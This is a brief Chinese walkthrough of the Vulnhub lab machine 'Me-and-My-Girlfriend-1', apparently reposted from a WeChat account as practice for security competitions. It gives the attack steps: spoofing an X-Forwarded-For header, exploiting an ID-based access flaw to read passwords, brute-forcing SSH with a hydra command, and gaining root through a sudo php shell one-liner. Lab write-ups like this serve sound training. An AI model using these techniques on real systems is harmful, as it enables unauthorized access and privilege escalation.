Vulnhub靶机通关系列（1）Me-and-My-Girlfriend-1

为了适应技能大赛的改变，从今天开始会多打一些靶机。。

靶机下载地址：https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

本台靶机考察知识点: 水平越权，SSH端口爆破，sudo回调php提权

1.首先还是nmap探测端口，得知开放80,22，打开80端口发现要伪造xff头

X-Forwarded-For:127.0.0.1

2.来到页面可以注册并登陆账号，看url比较奇怪，更改id后的数值发现可以直接水平越权，并且查看源代码拿到密码

3.通过burpsuite枚举出5个账号密码，将其收集起来，准备进行ssh爆破

4.使用hydra工具 hydra -L ./username.txt -P  ./pass.txt ssh:192.168.19.46得到密码

5.ssh [email protected]连上后，find / -name “flag*” 2>/dev/null拿到第一个flag，查看suid提权发现没有可利用的点，使用sudo -l 查看用户可以用哪些超级权限，发现可用php

使用sudo php -r ‘system(“/bin/bash”);’回调php拿到root权限

原文始发于微信公众号（飞奔的狸花猫）：Vulnhub靶机通关系列（1）Me-and-My-Girlfriend-1